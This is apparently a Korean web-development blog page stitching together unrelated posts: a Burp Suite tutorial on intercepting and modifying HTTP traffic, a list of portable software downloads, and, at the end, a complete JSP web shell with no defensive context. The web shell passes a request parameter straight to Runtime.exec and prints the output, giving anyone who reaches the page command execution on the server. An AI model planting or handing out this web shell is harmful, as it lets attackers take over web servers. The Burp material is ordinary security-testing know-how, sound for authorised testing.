웹 개발과 관련된 모든 것들

Burp Suite

1. 개요

1) Burp suite 는 web application 을 공격하기 위한 통합 플랫폼/local proxy program

2) Web application 의 분석 , 스캔 (취약점 파악)이 가능

3) Linux , Windows 모두 사용 가능

4) 최근에는 취약점 진단 툴로 많이 사용(웹 취약점 진단 도구)

2. 설치 및 실행

1) Burp suite 를 실행시키기 위해서는 JVM(Java Virtual Machine) 이 필요하므로 자신의

시스템에 설치되어 있는지 확인 (없으면 다운로드)

- cmd 창에서 java 나 java -version 을 입력하고 엔터

* java 라고 입력했을 경우 java 명령어 사용법이나 옵션들이 출력 또는

java -version 을 입력하면 설치한 jre 나 jdk 의 버전이 출력

- JVM 이 없을 경우 다운로드

* Burp suite 를 실행만 시킬 목적이라면 JRE 다운로드

* 확장 plug 를 사용하기 위해 컴파일도 할 목적이라면 JDK 를 다운로드

(Burp Suite 는 Java program 임)

2) Burp suite 다운로드

http://portswigger.net/suite/download.html 또는

http://www.darknet.org.uk/2007/01/burp-proxy-burp-suite-attacking-web-applications/

3) 설치

- 압축 파일일 경우 압축을 풀면 suite 배치 파일이 있다.(suite.bat)

- suite.bat 을 더블 클릭하거나 cmd 창에서 java -jar -Xmx512m burpsuite_v1.2.01.jar 입력

3.기능

1) proxy : end browser(burp suite 를 사용하는 client 측) 와 target web application

(공격/테스트할 웹 사이트) 사이에서 HTTP/HTTPS 를 가로채는(중계하는) proxy server

2) spider : Web application 의 내용(컨텐츠나 기능 등) 을 목록화(열거)해서 보여줌

3) scanner : Professional 버전에서만 지원되는 기능으로 web application 의 보안 취약점을

찾아주는 기능

4) intruder : Web application 에 대해 식별자(identifier) 목록화 , 유용한 데이터 수집 , 일반적인

취약점 수집과 같은 커스터마이즈된 공격을 하도록 설정할 수 있는 기능

5) repeater : 수동으로 조작하고 , HTTP request 재발행 , application 의 response 분석하는 기능

6) sequencer : application 의 session token 이나 다른 중요 data 에 대해 임의로 quality

분석하는 기능

7) decoder : Web application 의 data 를 encoding , decoding 하는 기능

8) comparer : 어떤 두 개의 데이터( 보통은 request 와 response 쌍을 의미) 의 "diff" 를 수행하기

위한 기능

(Burp suite 의 proxy 설정은 아래 Burp proxy 참고)

자세한 사항은 영문이지만 http://portswigger.net/suite/help.html 를 참고

Burp Proxy

1.개요

1) Burp Proxy는 web application 을 공격 또는 테스트하기 위한 대화형 HTTP/S 프록시 서버

2) Burp Proxy는 end browser 와 target web server 사이의 중간자로써 작동하며 양방향(end

browser 에서 server 로 , server 에서 end browser 로) 지나가는 raw traffic 을 가로채거나

검사, 수정 가능

3) Burp Proxy으로 web server 에서 전송된 data , 중요 파라미터를 모니터링하고 조작하여

application 취약점을 발견 가능

4) 다양한 악의적인 방법으로 browser 의 요청(request) 를 수정함으로써 공격 가능

(예 : SQL 삽입 공격 , cookie 변조 , 권한 획득 , session hijacking , 디렉토리 접근 ,

buffer overflow 등)

2.특징

1) 완전한 HTTP/HTTPS proxy server

2) 파라미터,헤더,다양한 미디어 컨텐츠 ,hex 편집 등 모든 요청(request)과 응답(response)에 대한

상세 분석 및 반환

3) 모든 요청 , 수정 , 응답에 대한 완전한 history 제공

(모든 요청을 조작할 수 있도록 browser 에서 보낸 모든 요청, 응답에 대한 완전한 history 유지)

4) Burp suite 내 다른 tools 와 완전한 통합 (intruder , spider , scanner 등)

5) downstream proxy server ,web server 인증 , NTLM(Windows NT LAN Manager) 인증 ,

Digest 인증 지원

6) HTTP 요청과 응답의 정규화 기반의 조작을 자동화

7) SSL 지원

8) HTTPS traffic 을 clean-text 로 보거나 수정 가능

9) Linux / Windows 에서 실행 가능

10) Burp Proxy 는 Burp Suite 의 일부분

3.Burp Proxy 사용

1) Burp Proxy 는 기본적으로 loopback 인터페이스 , 8080 포트 사용

2) Burp Proxy 의 작동을 위해 browser 에서 proxy server 를 127.0.0.1 , 포트를 8080 으로 설정

- Browser 메뉴 중 "도구" 선택

- "인터넷 옵션" 선택

- "연결" 탭 선택 후 "LAN 설정" 버튼 클릭 (아래 스샷 참고)

- 아래와 같이 프록시 서버 설정하고 "확인"

3) Burp suite 실행

4.기능

1) Intercept 탭

- intercept 탭은 browser 의 요청과 server 의 응답을 보여주고 수정하기 위해 사용

* "proxy" 탭 클릭

* "intercept is off" 일 경우 클릭해서 "intercept is on" 으로 설정

* web browser 실행(URL 을 입력해서 페이지 요청하기)

* Burp Proxy 가 browser 와 web server (또는 application) 사이에서 request 와 response를

intercept 하고 있으므로 다음 단계(다음 페이지)로 진행하기 위해서 forward 버튼을 클릭

(intercept 한 메시지를 버리려면 drop 버튼 클릭)

* raw : plain text 형식으로 표시.text pane 하단부에 정규식 기반(regex : regular expression)

탐색과 중요 메시지를 포함하고 있는 string 이 표시

(아래는 모 사이트에 로그인할 때 intercept 하고 있는 정보)

* params : parameter(name 과 value 쌍으로 구성된 URL Query string , Cookie header ,

message body 등) 를 포함하고 있는 request 출력

* headers : HTTP header 정보를 name 과 value 쌍으로 출력

(아래 텍스트박스에 intercept 한 정보 중에 검색하고자 하는 것을 입력하면 자동 매칭)

* hex : raw binary data 를 보여주고, 편집 가능(편집할 경우에는 hex 에디터를 사용)

2) action

- 다양한 action 을 수행하기 위해 사용하는 기능

- text pane 에서 마우스 우클릭 또는 action 버튼을 클릭

text pane 에서 마우스 우클릭했을 경우

action 버튼 클릭했을 경우

3) send to XXX : 메시지 또는 메시지 일부를 공격/분석하기 위해 Burp Suite 의 다른 tool 로 송신 가능

4) change request method : HTTP 메소드 변경 가능

(자동으로 GET -> POST , POST -> GET 으로 변환)

change request method 실행 전

change request method 실행 후

Firefox Portable Edition

막강한 확장기능 지원과 뛰어난 안정성을 자랑하는 오픈소스 웹 브라우저.

다운로드 Firefox Portable 3.5 (9MB)

Google Chrome Portable

빠른 자바스크립트 속도를 자랑하며 탭 별 프로세스 할당 방식으로 안정성을 강화. 쾌적한 인터페이스도 뛰어남.

다운로드 Chronium 3.0.182.3 (17.6MB)

OperaUSB

별도의 확장기능이 필요 없을 만큼 많은 기능이 내장된 웹 브라우저. 빠른 구동 속도와 웹페이지 렌더링 속도도 강점.

다운로드 OperaUSB 9.64 (5.1MB)

텍스트 편집

Notepad++

구문 하이라이트와 자동완성 등 강력한 기능의 텍스트 에디터

다운로드 Notepad++ Portable 5.4.3 (3MB)

Web Design Toy

HTML 코드를 입력하면 오른쪽 창에서 바로 바로 확인.

다운로드 Web Design Toy (449KB)

Oiko Visual CSS Editor

트리 구조 방식의 CSS 비주얼 에디터.

다운로드 Oiko Visual CSS Editor Portable 1.00 RC3 (1.1MB)

KompoZer Portable

드림위버와 비슷한 위지윅 HTML 에디터. 파이어폭스와 썬더버드의 Gecko 렌더링 엔진을 사용함. KompoZer는 NVU 1.0의 상당수 버그를 수정한 비공식 릴리즈.

다운로드 KompoZer Portable 0.7.10 Rev 2 (7.2MB)

이미지 편집

GIMP Portable

포토샵을 대체하는 오픈소스 비트맵 그래픽 에디터.

다운로드 GIMP Portable 2.6.6 (17MB)

Inkscape Portable

일러스트레이터를 대체하는 오픈소스 벡터 그래픽 에디터.

다운로드 Inkscape Portable 45.1 Rev 2 (19.5MB)

Fotografix

760KB의 작은 용량에도 레이어, 스크립트, 필터를 지원하며 간편한 이미지 편집에 좋음.

다운로드 Fotografix 1.1 (366KB)

Artweaver

다양한 브러쉬를 지원하는 페인팅 프로그램.

다운로드 Artweaver Portable (11.24MB)

FastStone Image Viewer Portable

유려한 인터페이스에 빠르고 안정적인 이미지 뷰어. 파일 컨버터와 간편한 에디터 기능도 내장.

다운로드 FastStone Image Viewer Portable 3.9 (5.0MB)

FTP 클라이언트

FileZilla Portable

빠르고 안정적인 무료 FTP 클라이언트.

다운로드 FileZilla Portable 3.2.6.1 (4MB)

WinSCP Portable

오픈소스 FTP/SFTP/SCP 클라이언트. Putty Portable 버전을 내장.

다운로드 WinSCP Portable 4.1.9 (2MB)

웹 서버

XAMPP Portable

따로 설정할 필요가 없는 웹 서버 패키지.

다운로드 XAMPP Portable 1.7.1 (82MB), Lite Version (50MB)

Server2Go

PHP, MySQL, Apache, SQLite, Perl 등을 지원하는 무료 서버 패키지.

다운로드 Server2Go

HTTP File Server

간편한 파일 공유 프로그램. 용량이 큰 파일을 클라이언트와 공유할 때 좋음.

다운로드 HFS 2.2f (600KB)

오피스 & 문서 툴

Foxit Reader

가볍고 빠른 PDF 리더. 포터블로 만들기 위해서는 프로그램을 설치하고 설치 폴더를 USB 드라이브로 복사. 설치 시 ebay 툴바 등 주의.

다운로드 Foxit Reader 3.0 (2.99MB)

OpenOffice Portable

마이크로소프트 오피스를 대체하는 워드, 스프레드시트, 프리젠테이션, 드로윙, 데이터베이스 통합 프로그램.

다운로드 OpenOffice Portable 3.1 (87MB)

AbiWord Portable

마이크로소프트 워드와 비슷한 가벼운 워드프로세서. 메일 병합 등의 기능과 플러그인도 지원.

다운로드 Abiword Portable 2.6.8 (6.3MB)

Thunderbird Portable Edition

막강한 확장기능 지원이 강점인 이메일 툴. 포터블 버전이라 컴퓨터에 흔적을 남기지 않고 이메일과 주소록을 관리함.

다운로드 Thunderbird Portable 2.0.0.22 (6.7MB)

노트 툴

MemPad

트리 기반의 노트 관리 유틸리티. 모든 페이지는 단일 파일로 저장되고 다이어리 모드를 지원.

다운로드 MemPad 3.32 (97KB)

TiddlyWiki

단일 HTML 파일로 구성되어 있지만 다양한 플러그인 지원을 통해 위키, 노트북, GTD 툴 등 여러 용도로 활용할 수 있음.

다운로드 TiddlyWiki (346KB)

ToDoList

깔끔한 인터페이스의 할 일 관리 유틸리티. 할 일은 XML 포맷으로 저장하고 프로그램 환경설정은 ini 파일로 저장.

다운로드 ToDoList 5.8 (801KB)

동기화 & 백업 툴

Toucan

파일 동기화, 백업 & 암호화 유틸리티. 4개의 동기화 모드를 제공하며 7-zip 백업과 256bit 암호화를 지원.

다운로드 Toucan Portable 2.1.0 (2.5MB)

FreeFileSync

드래그앤드롭과 4GB 이상의 파일을 지원하는 폴더 비교 & 동기화 툴. 우분투 버전도 있음.

다운로드 FreeFileSync 2.1 (1.2MB)

유틸리티

KeePass Password Safe Portable

오픈소스 패스워드 관리 유틸리티. 암호 데이터베이스를 하나의 마스터 패스워드로 보호.

다운로드 KeePass Password Safe Portable 1.16 (1.7MB)

7-Zip Portable

다양한 포맷을 지원하는 막강한 압축률의 압축 유틸리티.

다운로드 7-ZIP Portable 4.65 Rev 2 (1.4MB)

Font Matcher

이미지 속의 폰트를 실제 폰트와 매치해줌. TTF 폰트만 지원.

다운로드 Font Matcher 1.0.3 (160KB)

IcoFX

아이콘 변환, 추출 등을 지원하는 아이콘 에디터. 256x256 해상도까지 지원.

다운로드 IcoFX 1.6.4 Portable (1.4MB)

PickPick

세계에서 인정받는 자랑스런 국산 스크린 캡쳐 툴. 색상 추출 등의 다양한 기능과 함께 간단한 이미지 편집도 지원.

다운로드 PickPick 1.8.1.0 Portable (957KB)

VirtuaWin

작은 리소스의 가상 데스크탑 관리 프로그램.

다운로드 VirtuaWin 4.0.1 Portable (97KB)

[이 게시물은 인천올님에 의해 2010-06-10 14:06:36 추천정보에서 이동 됨]

출처 : http://www.incheonall.com/bbs/board.php?bo_table=pds&wr_id=44&page=

JSP 용 web shell



<%@ page contentType="text/html;charset=euc-kr" %>
<%@ page import="java.io.*"%>
<%
String execute = request.getParameter("execute");
if(execute == null) execute = "";
%>
<html>
<head>
<title>
WebShell
</title>
<script>
function send()
{
        document.main.submit();
}
</script>

</head>
<body>
<br>
<form method="post" name="main" action="webshell.jsp">
<table width="400"  border="0" CELLPADDING=0 CELLSPACING=0>
    <tr bgcolor="#F7FCFE">
        <td height="22" align="center" width="70">명령어</td>
        <td height="22" align="center" align="left">
        <input type="text" name="execute" size="30" value="<%=execute%>">
        <input type="button" value="실행" onClick="javascript:send();"></td>
        </tr>
</table>
</form>
<hr>
<%
if(!execute.equals("")){
BufferedReader br = null;
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec(execute);
br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String line;
while((line = br.readLine())!=null){
        out.println(line+"<br>");
}
br.close();
proc.destroy();
}
%>
</body>
</html>